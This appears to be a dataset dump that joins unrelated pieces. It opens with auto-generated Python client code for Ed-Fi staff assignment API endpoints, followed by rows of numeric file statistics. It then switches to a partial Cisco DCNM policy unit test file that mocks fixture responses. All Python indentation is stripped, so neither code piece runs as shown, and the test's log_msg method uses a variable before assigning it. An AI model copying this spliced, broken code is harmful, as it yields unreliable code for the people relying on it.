raise ValueError("Invalid value for parameter `staff_classification_descriptor` when calling `get_staff_education_organization_assignment_associations`, length must be less than or equal to `306`") # noqa: E501
if self.api_client.client_side_validation and ('staff_unique_id' in params and
len(params['staff_unique_id']) > 32):
raise ValueError("Invalid value for parameter `staff_unique_id` when calling `get_staff_education_organization_assignment_associations`, length must be less than or equal to `32`") # noqa: E501
if self.api_client.client_side_validation and ('credential_identifier' in params and
len(params['credential_identifier']) > 60):
raise ValueError("Invalid value for parameter `credential_identifier` when calling `get_staff_education_organization_assignment_associations`, length must be less than or equal to `60`") # noqa: E501
if self.api_client.client_side_validation and ('state_of_issue_state_abbreviation_descriptor' in params and
len(params['state_of_issue_state_abbreviation_descriptor']) > 306):
raise ValueError("Invalid value for parameter `state_of_issue_state_abbreviation_descriptor` when calling `get_staff_education_organization_assignment_associations`, length must be less than or equal to `306`") # noqa: E501
if self.api_client.client_side_validation and ('employment_status_descriptor' in params and
len(params['employment_status_descriptor']) > 306):
raise ValueError("Invalid value for parameter `employment_status_descriptor` when calling `get_staff_education_organization_assignment_associations`, length must be less than or equal to `306`") # noqa: E501
if self.api_client.client_side_validation and ('position_title' in params and
len(params['position_title']) > 100):
raise ValueError("Invalid value for parameter `position_title` when calling `get_staff_education_organization_assignment_associations`, length must be less than or equal to `100`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
query_params.append(('offset', params['offset'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'min_change_version' in params:
query_params.append(('minChangeVersion', params['min_change_version'])) # noqa: E501
if 'max_change_version' in params:
query_params.append(('maxChangeVersion', params['max_change_version'])) # noqa: E501
if 'total_count' in params:
query_params.append(('totalCount', params['total_count'])) # noqa: E501
if 'staff_classification_descriptor' in params:
query_params.append(('staffClassificationDescriptor', params['staff_classification_descriptor'])) # noqa: E501
if 'begin_date' in params:
query_params.append(('beginDate', params['begin_date'])) # noqa: E501
if 'education_organization_id' in params:
query_params.append(('educationOrganizationId', params['education_organization_id'])) # noqa: E501
if 'staff_unique_id' in params:
query_params.append(('staffUniqueId', params['staff_unique_id'])) # noqa: E501
if 'credential_identifier' in params:
query_params.append(('credentialIdentifier', params['credential_identifier'])) # noqa: E501
if 'state_of_issue_state_abbreviation_descriptor' in params:
query_params.append(('stateOfIssueStateAbbreviationDescriptor', params['state_of_issue_state_abbreviation_descriptor'])) # noqa: E501
if 'employment_education_organization_id' in params:
query_params.append(('employmentEducationOrganizationId', params['employment_education_organization_id'])) # noqa: E501
if 'employment_status_descriptor' in params:
query_params.append(('employmentStatusDescriptor', params['employment_status_descriptor'])) # noqa: E501
if 'employment_hire_date' in params:
query_params.append(('employmentHireDate', params['employment_hire_date'])) # noqa: E501
if 'end_date' in params:
query_params.append(('endDate', params['end_date'])) # noqa: E501
if 'full_time_equivalency' in params:
query_params.append(('fullTimeEquivalency', params['full_time_equivalency'])) # noqa: E501
if 'id' in params:
query_params.append(('id', params['id'])) # noqa: E501
if 'order_of_assignment' in params:
query_params.append(('orderOfAssignment', params['order_of_assignment'])) # noqa: E501
if 'position_title' in params:
query_params.append(('positionTitle', params['position_title'])) # noqa: E501
header_params = {}
if 'snapshot_identifier' in params:
header_params['Snapshot-Identifier'] = params['snapshot_identifier'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/staffEducationOrganizationAssignmentAssociations', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[EdFiStaffEducationOrganizationAssignmentAssociation]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_staff_education_organization_assignment_associations_by_id(self, id, **kwargs): # noqa: E501
"""Retrieves a specific resource using the resource's identifier (using the \"Get By Id\" pattern). # noqa: E501
This GET operation retrieves a resource by the specified resource identifier. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_staff_education_organization_assignment_associations_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_none_match: The previously returned ETag header value, used here to prevent the unnecessary data transfer of an unchanged resource.
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: EdFiStaffEducationOrganizationAssignmentAssociation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_staff_education_organization_assignment_associations_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_staff_education_organization_assignment_associations_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_staff_education_organization_assignment_associations_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Retrieves a specific resource using the resource's identifier (using the \"Get By Id\" pattern). # noqa: E501
This GET operation retrieves a resource by the specified resource identifier. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_staff_education_organization_assignment_associations_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param str if_none_match: The previously returned ETag header value, used here to prevent the unnecessary data transfer of an unchanged resource.
:param str snapshot_identifier: Indicates the Snapshot-Identifier that should be used.
:return: EdFiStaffEducationOrganizationAssignmentAssociation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'if_none_match', 'snapshot_identifier'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_staff_education_organization_assignment_associations_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `get_staff_education_organization_assignment_associations_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'if_none_match' in params:
header_params['If-None-Match'] = params['if_none_match'] # noqa: E501
if 'snapshot_identifier' in params:
header_params['Snapshot-Identifier'] = params['snapshot_identifier'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/staffEducationOrganizationAssignmentAssociations/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='EdFiStaffEducationOrganizationAssignmentAssociation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_staff_education_organization_assignment_association(self, staff_education_organization_assignment_association, **kwargs): # noqa: E501
"""Creates or updates resources based on the natural key values of the supplied resource. # noqa: E501
The POST operation can be used to create or update resources. In database terms, this is often referred to as an \"upsert\" operation (insert + update). Clients should NOT include the resource \"id\" in the JSON body because it will result in an error. The web service will identify whether the resource already exists based on the natural key values provided, and update or create the resource appropriately. It is recommended to use POST for both create and update except while updating natural key of a resource in which case PUT operation must be used. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_staff_education_organization_assignment_association(staff_education_organization_assignment_association, async_req=True)
>>> result = thread.get()
:param async_req bool
:param EdFiStaffEducationOrganizationAssignmentAssociation staff_education_organization_assignment_association: The JSON representation of the \"staffEducationOrganizationAssignmentAssociation\" resource to be created or updated. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.post_staff_education_organization_assignment_association_with_http_info(staff_education_organization_assignment_association, **kwargs) # noqa: E501
else:
(data) = self.post_staff_education_organization_assignment_association_with_http_info(staff_education_organization_assignment_association, **kwargs) # noqa: E501
return data
def post_staff_education_organization_assignment_association_with_http_info(self, staff_education_organization_assignment_association, **kwargs): # noqa: E501
"""Creates or updates resources based on the natural key values of the supplied resource. # noqa: E501
The POST operation can be used to create or update resources. In database terms, this is often referred to as an \"upsert\" operation (insert + update). Clients should NOT include the resource \"id\" in the JSON body because it will result in an error. The web service will identify whether the resource already exists based on the natural key values provided, and update or create the resource appropriately. It is recommended to use POST for both create and update except while updating natural key of a resource in which case PUT operation must be used. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.post_staff_education_organization_assignment_association_with_http_info(staff_education_organization_assignment_association, async_req=True)
>>> result = thread.get()
:param async_req bool
:param EdFiStaffEducationOrganizationAssignmentAssociation staff_education_organization_assignment_association: The JSON representation of the \"staffEducationOrganizationAssignmentAssociation\" resource to be created or updated. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['staff_education_organization_assignment_association'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_staff_education_organization_assignment_association" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'staff_education_organization_assignment_association' is set
if self.api_client.client_side_validation and ('staff_education_organization_assignment_association' not in params or
params['staff_education_organization_assignment_association'] is None): # noqa: E501
raise ValueError("Missing the required parameter `staff_education_organization_assignment_association` when calling `post_staff_education_organization_assignment_association`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'staff_education_organization_assignment_association' in params:
body_params = params['staff_education_organization_assignment_association']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/staffEducationOrganizationAssignmentAssociations', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def put_staff_education_organization_assignment_association(self, id, staff_education_organization_assignment_association, **kwargs): # noqa: E501
"""Updates a resource based on the resource identifier. # noqa: E501
The PUT operation is used to update a resource by identifier. If the resource identifier (\"id\") is provided in the JSON body, it will be ignored. Additionally, this API resource is not configured for cascading natural key updates. Natural key values for this resource cannot be changed using PUT operation and will not be modified in the database, and so recommendation is to use POST as that supports upsert behavior. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_staff_education_organization_assignment_association(id, staff_education_organization_assignment_association, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param EdFiStaffEducationOrganizationAssignmentAssociation staff_education_organization_assignment_association: The JSON representation of the \"staffEducationOrganizationAssignmentAssociation\" resource to be created or updated. (required)
:param str if_match: The ETag header value used to prevent the PUT from updating a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.put_staff_education_organization_assignment_association_with_http_info(id, staff_education_organization_assignment_association, **kwargs) # noqa: E501
else:
(data) = self.put_staff_education_organization_assignment_association_with_http_info(id, staff_education_organization_assignment_association, **kwargs) # noqa: E501
return data
def put_staff_education_organization_assignment_association_with_http_info(self, id, staff_education_organization_assignment_association, **kwargs): # noqa: E501
"""Updates a resource based on the resource identifier. # noqa: E501
The PUT operation is used to update a resource by identifier. If the resource identifier (\"id\") is provided in the JSON body, it will be ignored. Additionally, this API resource is not configured for cascading natural key updates. Natural key values for this resource cannot be changed using PUT operation and will not be modified in the database, and so recommendation is to use POST as that supports upsert behavior. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.put_staff_education_organization_assignment_association_with_http_info(id, staff_education_organization_assignment_association, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: A resource identifier that uniquely identifies the resource. (required)
:param EdFiStaffEducationOrganizationAssignmentAssociation staff_education_organization_assignment_association: The JSON representation of the \"staffEducationOrganizationAssignmentAssociation\" resource to be created or updated. (required)
:param str if_match: The ETag header value used to prevent the PUT from updating a resource modified by another consumer.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'staff_education_organization_assignment_association', 'if_match'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method put_staff_education_organization_assignment_association" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `put_staff_education_organization_assignment_association`") # noqa: E501
# verify the required parameter 'staff_education_organization_assignment_association' is set
if self.api_client.client_side_validation and ('staff_education_organization_assignment_association' not in params or
params['staff_education_organization_assignment_association'] is None): # noqa: E501
raise ValueError("Missing the required parameter `staff_education_organization_assignment_association` when calling `put_staff_education_organization_assignment_association`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'if_match' in params:
header_params['If-Match'] = params['if_match'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'staff_education_organization_assignment_association' in params:
body_params = params['staff_education_organization_assignment_association']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2_client_credentials'] # noqa: E501
return self.api_client.call_api(
'/ed-fi/staffEducationOrganizationAssignmentAssociations/{id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 61.975098
| 578
| 0.691649
| 5,617
| 47,287
| 5.586434
| 0.073171
| 0.035948
| 0.072086
| 0.099812
| 0.935211
| 0.925045
| 0.90465
| 0.893177
| 0.878422
| 0.870487
| 0
| 0.013414
| 0.236936
| 47,287
| 762
| 579
| 62.05643
| 0.85622
| 0.425783
| 0
| 0.713592
| 0
| 0.024272
| 0.303967
| 0.159516
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031553
| false
| 0
| 0.009709
| 0
| 0.087379
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54a21e5df38604892c8b4a86723e5748f670e300
| 57,486
|
py
|
Python
|
tests/unit/modules/dcnm/test_dcnm_policy.py
|
CiscoDevNet/ansible-dcnm
|
1fa025085342d7d57fc4588471504d3089bd296f
|
[
"Apache-2.0"
] | 28
|
2020-07-19T02:56:38.000Z
|
2022-03-03T01:28:10.000Z
|
tests/unit/modules/dcnm/test_dcnm_policy.py
|
CiscoDevNet/ansible-dcnm
|
1fa025085342d7d57fc4588471504d3089bd296f
|
[
"Apache-2.0"
] | 67
|
2020-07-17T21:49:00.000Z
|
2022-03-20T14:59:23.000Z
|
tests/unit/modules/dcnm/test_dcnm_policy.py
|
CiscoDevNet/ansible-dcnm
|
1fa025085342d7d57fc4588471504d3089bd296f
|
[
"Apache-2.0"
] | 18
|
2020-07-07T14:42:22.000Z
|
2022-03-09T12:31:13.000Z
|
#!/usr/bin/python
#
# Copyright (c) 2020 Cisco and/or its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible_collections.ansible.netcommon.tests.unit.compat.mock import patch
from ansible_collections.cisco.dcnm.plugins.modules import dcnm_policy
from .dcnm_module import TestDcnmModule, set_module_args, loadPlaybookData
import json, copy
class TestDcnmPolicyModule(TestDcnmModule):
module = dcnm_policy
fd = None
def init_data(self):
pass
def log_msg (self, msg):
if fd is None:
fd = open("policy-ut.log", "w+")
self.fd.write (msg)
self.fd.flush()
def setUp(self):
super(TestDcnmPolicyModule, self).setUp()
self.mock_dcnm_fabric_details = patch('ansible_collections.cisco.dcnm.plugins.modules.dcnm_policy.get_fabric_inventory_details')
self.run_dcnm_fabric_details = self.mock_dcnm_fabric_details.start()
self.mock_dcnm_ip_sn = patch('ansible_collections.cisco.dcnm.plugins.modules.dcnm_policy.get_ip_sn_dict')
self.run_dcnm_ip_sn = self.mock_dcnm_ip_sn.start()
self.mock_dcnm_send = patch('ansible_collections.cisco.dcnm.plugins.modules.dcnm_policy.dcnm_send')
self.run_dcnm_send = self.mock_dcnm_send.start()
def tearDown(self):
super(TestDcnmPolicyModule, self).tearDown()
self.mock_dcnm_send.stop()
#################################### FIXTURES ############################
def load_policy_fixtures (self):
if ('test_dcnm_policy_merged_new' == self._testMethodName):
create_succ_resp1 = self.payloads_data.get('success_create_response_101')
create_succ_resp2 = self.payloads_data.get('success_create_response_102')
create_succ_resp3 = self.payloads_data.get('success_create_response_103')
create_succ_resp4 = self.payloads_data.get('success_create_response_104')
create_succ_resp5 = self.payloads_data.get('success_create_response_105')
deploy_succ_resp = self.payloads_data.get('success_deploy_response_101_105')
have_all_resp = self.payloads_data.get('policy_have_all_resp')
self.run_dcnm_send.side_effect = [have_all_resp,
create_succ_resp1, create_succ_resp2,
create_succ_resp3, create_succ_resp4,
create_succ_resp5,
deploy_succ_resp]
if ('test_dcnm_policy_merged_same_template' == self._testMethodName):
have_101_105_resp = self.payloads_data.get('have_response_101_105')
create_succ_resp1 = self.payloads_data.get('success_create_response_101')
deploy_succ_resp = self.payloads_data.get('success_deploy_response_101_101_5')
self.run_dcnm_send.side_effect = [have_101_105_resp,
create_succ_resp1, create_succ_resp1,
create_succ_resp1, create_succ_resp1,
create_succ_resp1,
deploy_succ_resp]
if ('test_dcnm_policy_merged_new_check_mode' == self._testMethodName):
have_all_resp = self.payloads_data.get('policy_have_all_resp')
self.run_dcnm_send.side_effect = [have_all_resp]
if ('test_dcnm_policy_merged_existing' == self._testMethodName):
create_succ_resp1 = self.payloads_data.get('success_create_response_101')
create_succ_resp2 = self.payloads_data.get('success_create_response_102')
create_succ_resp3 = self.payloads_data.get('success_create_response_103')
create_succ_resp4 = self.payloads_data.get('success_create_response_104')
create_succ_resp5 = self.payloads_data.get('success_create_response_105')
deploy_succ_resp = self.payloads_data.get('success_deploy_response_101_105')
have_101_105_resp = self.payloads_data.get('have_response_101_105')
self.run_dcnm_send.side_effect = [have_101_105_resp,
deploy_succ_resp]
if ('test_dcnm_policy_merged_existing_and_non_exist' == self._testMethodName):
create_succ_resp4 = self.payloads_data.get('success_create_response_104')
create_succ_resp5 = self.payloads_data.get('success_create_response_105')
deploy_succ_resp = self.payloads_data.get('success_deploy_response_101_105')
have_101_103_resp = self.payloads_data.get('have_response_101_103')
self.run_dcnm_send.side_effect = [have_101_103_resp,
create_succ_resp4, create_succ_resp5,
deploy_succ_resp]
if ('test_dcnm_policy_without_state' == self._testMethodName):
create_succ_resp4 = self.payloads_data.get('success_create_response_104')
create_succ_resp5 = self.payloads_data.get('success_create_response_105')
deploy_succ_resp = self.payloads_data.get('success_deploy_response_104_105')
self.run_dcnm_send.side_effect = [[],
create_succ_resp4, create_succ_resp5,
deploy_succ_resp]
if ('test_dcnm_policy_merge_additional_policies' == self._testMethodName):
create_succ_resp4 = self.payloads_data.get('success_create_response_104')
create_succ_resp4_1 = self.payloads_data.get('success_create_response_104_1')
deploy_succ_resp = self.payloads_data.get('success_deploy_response_104_104_1')
self.run_dcnm_send.side_effect = [[],
create_succ_resp4, create_succ_resp4_1,
deploy_succ_resp]
if ('test_dcnm_policy_merge_additional_policies_exist' == self._testMethodName):
have_resp_104 = self.payloads_data.get('have_response_104')
create_succ_resp4 = self.payloads_data.get('success_create_response_104')
create_succ_resp4_1 = self.payloads_data.get('success_create_response_104_1')
deploy_succ_resp = self.payloads_data.get('success_deploy_response_104_104_1')
self.run_dcnm_send.side_effect = [have_resp_104,
create_succ_resp4, create_succ_resp4_1,
deploy_succ_resp]
if ('test_dcnm_policy_merge_multiple_switches' == self._testMethodName):
create_succ_resp12 = self.payloads_data.get('success_create_response_101_sw2')
create_succ_resp13 = self.payloads_data.get('success_create_response_101_sw3')
create_succ_resp22 = self.payloads_data.get('success_create_response_102_sw2')
create_succ_resp23 = self.payloads_data.get('success_create_response_102_sw3')
create_succ_resp32 = self.payloads_data.get('success_create_response_103_sw2')
create_succ_resp33 = self.payloads_data.get('success_create_response_103_sw3')
create_succ_resp4 = self.payloads_data.get('success_create_response_104')
create_succ_resp5 = self.payloads_data.get('success_create_response_105')
deploy_succ_resp_multi_sw = self.payloads_data.get('success_deploy_response_101_105_multi_switch')
self.run_dcnm_send.side_effect = [[],
create_succ_resp12, create_succ_resp13,
create_succ_resp22, create_succ_resp23,
create_succ_resp32, create_succ_resp33,
create_succ_resp4, create_succ_resp5,
deploy_succ_resp_multi_sw]
if ('test_dcnm_policy_merge_deploy_false' == self._testMethodName):
create_succ_resp4 = self.payloads_data.get('success_create_response_104')
self.run_dcnm_send.side_effect = [[], create_succ_resp4]
if ('test_dcnm_policy_merge_no_deploy' == self._testMethodName):
create_succ_resp1 = self.payloads_data.get('success_create_response_101')
create_succ_resp2 = self.payloads_data.get('success_create_response_102')
create_succ_resp3 = self.payloads_data.get('success_create_response_103')
create_succ_resp4 = self.payloads_data.get('success_create_response_104')
create_succ_resp5 = self.payloads_data.get('success_create_response_105')
deploy_succ_resp = self.payloads_data.get('success_deploy_response_101_105')
have_all_resp = self.payloads_data.get('policy_have_all_resp')
self.run_dcnm_send.side_effect = [have_all_resp,
create_succ_resp1, create_succ_resp2,
create_succ_resp3, create_succ_resp4,
create_succ_resp5,
deploy_succ_resp]
if ('test_dcnm_policy_merged_new_with_vars' == self._testMethodName):
create_succ_resp1 = self.payloads_data.get('success_create_response_125')
create_succ_resp2 = self.payloads_data.get('success_create_response_126')
create_succ_resp3 = self.payloads_data.get('success_create_response_127')
deploy_succ_resp = self.payloads_data.get('success_deploy_response_125_127')
have_all_resp = self.payloads_data.get('policy_have_all_resp')
self.run_dcnm_send.side_effect = [have_all_resp,
create_succ_resp1, create_succ_resp2,
create_succ_resp3,
deploy_succ_resp]
if ('test_dcnm_policy_modify_with_template_name' == self._testMethodName):
deploy_succ_resp = self.payloads_data.get('success_deploy_response_104')
have_all_resp = self.payloads_data.get('have_response_101_105')
create_succ_resp1 = self.payloads_data.get('success_create_response_101')
self.run_dcnm_send.side_effect = [have_all_resp,
create_succ_resp1,
deploy_succ_resp]
if ('test_dcnm_policy_modify_with_policy_id' == self._testMethodName):
create_succ_resp4 = self.payloads_data.get('success_create_response_104')
deploy_succ_resp = self.payloads_data.get('success_deploy_response_104')
get_response_104 = self.payloads_data.get('get_response_104')
have_all_resp = self.payloads_data.get('have_response_101_105')
self.run_dcnm_send.side_effect = [get_response_104, have_all_resp,
create_succ_resp4,
deploy_succ_resp]
if ('test_dcnm_policy_modify_policy_with_vars' == self._testMethodName):
create_succ_resp1 = self.payloads_data.get('success_create_response_125')
deploy_succ_resp = self.payloads_data.get('success_deploy_response_125')
have_all_resp = self.payloads_data.get('have_response_125')
get_response_125 = self.payloads_data.get('get_response_125')
self.run_dcnm_send.side_effect = [get_response_125, have_all_resp,
create_succ_resp1,
deploy_succ_resp]
if ('test_dcnm_policy_delete_with_template_name' == self._testMethodName):
have_resp_101_105 = self.payloads_data.get('have_response_101_105')
mark_delete_resp_101 = self.payloads_data.get('mark_delete_response_101')
mark_delete_resp_102 = self.payloads_data.get('mark_delete_response_102')
mark_delete_resp_103 = self.payloads_data.get('mark_delete_response_103')
mark_delete_resp_104 = self.payloads_data.get('mark_delete_response_104')
mark_delete_resp_105 = self.payloads_data.get('mark_delete_response_105')
delete_config_save_resp = self.payloads_data.get('delete_config_deploy_response_101_105')
self.run_dcnm_send.side_effect = [have_resp_101_105,
mark_delete_resp_101, mark_delete_resp_102,
mark_delete_resp_103, mark_delete_resp_104,
mark_delete_resp_105, delete_config_save_resp,
[], [], [], [], [],
]
if ('test_dcnm_policy_delete_with_policy_id' == self._testMethodName):
get_response_101 = self.payloads_data.get('get_response_101')
get_response_102 = self.payloads_data.get('get_response_102')
get_response_103 = self.payloads_data.get('get_response_103')
get_response_104 = self.payloads_data.get('get_response_104')
get_response_105 = self.payloads_data.get('get_response_105')
have_resp_101_105 = self.payloads_data.get('have_response_101_105')
mark_delete_resp_101 = self.payloads_data.get('mark_delete_response_101')
mark_delete_resp_102 = self.payloads_data.get('mark_delete_response_102')
mark_delete_resp_103 = self.payloads_data.get('mark_delete_response_103')
mark_delete_resp_104 = self.payloads_data.get('mark_delete_response_104')
mark_delete_resp_105 = self.payloads_data.get('mark_delete_response_105')
delete_config_save_resp = self.payloads_data.get('delete_config_deploy_response_101_105')
self.run_dcnm_send.side_effect = [
get_response_101, get_response_102,
get_response_103, get_response_104,
get_response_105, have_resp_101_105,
mark_delete_resp_101, mark_delete_resp_102,
mark_delete_resp_103, mark_delete_resp_104,
mark_delete_resp_105, delete_config_save_resp,
[], [], [], [], [],
]
if ('test_dcnm_policy_delete_multiple_policies_with_template_name' == self._testMethodName):
have_resp_101_105_multi = self.payloads_data.get('have_response_101_105_multi')
mark_delete_resp_101 = self.payloads_data.get('mark_delete_response_101')
mark_delete_resp_102 = self.payloads_data.get('mark_delete_response_102')
mark_delete_resp_103 = self.payloads_data.get('mark_delete_response_103')
mark_delete_resp_104 = self.payloads_data.get('mark_delete_response_104')
mark_delete_resp_105 = self.payloads_data.get('mark_delete_response_105')
delete_config_save_resp = self.payloads_data.get('delete_config_deploy_response_101_105')
self.run_dcnm_send.side_effect = [have_resp_101_105_multi,
mark_delete_resp_101, mark_delete_resp_101,
mark_delete_resp_101, mark_delete_resp_102,
mark_delete_resp_102, mark_delete_resp_103,
mark_delete_resp_104, mark_delete_resp_105,
delete_config_save_resp,
[], [], [], [], [], [], [], [],
]
if ('test_dcnm_policy_delete_with_template_name_with_second_delete' == self._testMethodName):
have_resp_101_105 = self.payloads_data.get('have_response_101_105')
get_response_101 = self.payloads_data.get('get_response_101')
get_response_102 = self.payloads_data.get('get_response_102')
get_response_103 = self.payloads_data.get('get_response_103')
get_response_104 = self.payloads_data.get('get_response_104')
get_response_105 = self.payloads_data.get('get_response_105')
mark_delete_resp_101 = self.payloads_data.get('mark_delete_response_101')
mark_delete_resp_102 = self.payloads_data.get('mark_delete_response_102')
mark_delete_resp_103 = self.payloads_data.get('mark_delete_response_103')
mark_delete_resp_104 = self.payloads_data.get('mark_delete_response_104')
mark_delete_resp_105 = self.payloads_data.get('mark_delete_response_105')
delete_config_save_resp = self.payloads_data.get('delete_config_deploy_response_101_105')
delete_resp_101 = self.payloads_data.get('delete_response_101')
delete_resp_102 = self.payloads_data.get('delete_response_102')
delete_resp_103 = self.payloads_data.get('delete_response_103')
delete_resp_104 = self.payloads_data.get('delete_response_104')
delete_resp_105 = self.payloads_data.get('delete_response_105')
self.run_dcnm_send.side_effect = [have_resp_101_105,
mark_delete_resp_101, mark_delete_resp_102,
mark_delete_resp_103, mark_delete_resp_104,
mark_delete_resp_105, delete_config_save_resp,
get_response_101, delete_resp_101,
get_response_102, delete_resp_102,
get_response_103, delete_resp_103,
get_response_104, delete_resp_104,
get_response_105, delete_resp_105,
delete_config_save_resp
]
if ('test_dcnm_policy_query_with_switch_info' == self._testMethodName):
have_resp_101_105 = self.payloads_data.get('have_response_101_105')
self.run_dcnm_send.side_effect = [have_resp_101_105,
]
if ('test_dcnm_policy_query_with_policy_id' == self._testMethodName):
get_resp_101 = self.payloads_data.get('get_response_101')
get_resp_102 = self.payloads_data.get('get_response_102')
